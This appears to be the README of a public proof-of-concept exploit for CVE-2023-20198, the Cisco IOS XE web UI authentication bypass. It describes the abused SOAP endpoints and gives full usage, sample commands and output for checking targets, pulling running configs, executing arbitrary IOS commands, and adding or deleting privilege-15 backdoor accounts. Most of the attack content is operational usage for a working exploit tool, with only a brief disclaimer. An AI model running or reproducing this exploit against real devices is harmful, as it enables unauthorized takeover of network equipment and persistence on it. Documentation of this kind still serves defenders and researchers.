# CVE-2023-20198
Exploit PoC for CVE-2023-20198

## Description
CVE-2023-20198 is characterized by improper path validation to bypass Nginx filtering to reach the `webui_wsma_http` web endpoint without requiring authentication.<br>
By bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 privileges.<br>
Cisco's investigation into active exploitation of the previously undisclosed vulnerability revealed threat actors first exploited CVE-2023-20198 to add a new user with Privilege level 15. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS `root` user to facilitate implantation.<br> 

This PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints:<br>
The vulnerability check, config, and command execution options all target the `cisco:wsma-exec` SOAP endpoint to insert commands into the `execCLI` element tag.<br>
The add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but thats outside the scope of this PoC.<br>

Abuse of the `cisco:wsma-exec` SOAP endpoint came from the nuclei template<br>
Abuse of the `cisco:wsma-config` SOAP endpoint came from the horizon3ai PoC<br>

Note: I did not conduct any of the original research or PoC development for this CVE. See the references section for credit.

## Usage
usage: [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]

CVE-2023-20198 Exploit PoC

  -h, --help      show this help message and exit
  -t targetIP     Target IP Address
  -l targetFile   File containing IP Addresses (-c only)
  -https          Use https
  -c              [X] Check for vulnerability
  -g              [X] Get Cisco IOS running config
  -e command      [X] Execute Cisco IOS command
  -a              [X] Add new priv 15 user
  -d              [X] Remove priv 15 user
  -u newUserName  [Optional] user name for -a or -d. Default: shellsmoke
  -p newUserPass  [Optional] new user pass for -a. Default: pwned
  -o outputFile   Write output to file
  -v              Increase verbosity

### Vulnerability check
To check for CVE-2023-20198, `-c` will attempt to exploit the vulnerability to execute `uname -a`<br>
# ./ -t -c

Testing for vulnerability
Target IP:
Target URL:
Vulnerable:     True
IOS Ver:        <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)

### Get Cisco Config
The `-g` option executes `sh run` to pull the running config<br>
# ./ -t -g

Building configuration...
Current configuration : 6988 bytes
version 16.6
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec

### Execute commands
Arbitrary Cisco IOS commands can be executed with the `-e` option.<br>
Extreme caution should be used when using this to make configuration changes. There is no input validation and changes are applied immediately to the running config.<br>
# ./ -t -e 'sh log'

Selected Target:
Running in Exec Mode
Executing Command:      sh log

Sending exploit to target URL:

Syslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)
No Active Message Discriminator.
No Inactive Message Discriminator.
    Console logging: level debugging, 5368 messages logged, xml disabled,
                     filtering disabled

### Add user
The `-a` option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with `-u` and `-p` respectively.<br>
# ./ -t -a -u shellsmoke -p pwned

Selected Target:
Adding New Privilege 15 User
New User Name:  shellsmoke
New User Pass:  pwned

Sending exploit to target URL:

No reportable output from adding users
Check verbose ouput or get running config

### Del user
The `-d` option can be used to remove a user account from the device, and respects the username specified with `-u`.<br>
Caution should be used to make sure you aren't deleting a legitimate account.<br>
This was added for instances where shell/webui access to an exploited Cisco can not be obtained. It was observed that adding a Privilege 15 user does not grant webui access and could lead to leaving exploitation artifacts on hosts.<br>

## References
[Cisco Advisory](<br>
[horizon3ai CVE-2023-20198 research](<br>
[horizon3ai CVE-2023-20198 PoC](<br>
[nuclei CVE-2023-20198 template]( (Authors: iamnoooob, rootxharsh, pdresearch)<br>
[LeakIX CVE-2023-20273 PoC](<br>

- [ ] https support
- [ ] CVE-2023-20273 Implementation
- [ ] Timeout and error handling

## Disclaimer
The code contained in this project is intended only for research and usage on systems where the user has explicit authorization.<br>
The author of this project is not responsible or liable for misuse of the software.<br>
Use responsibly and don't be evil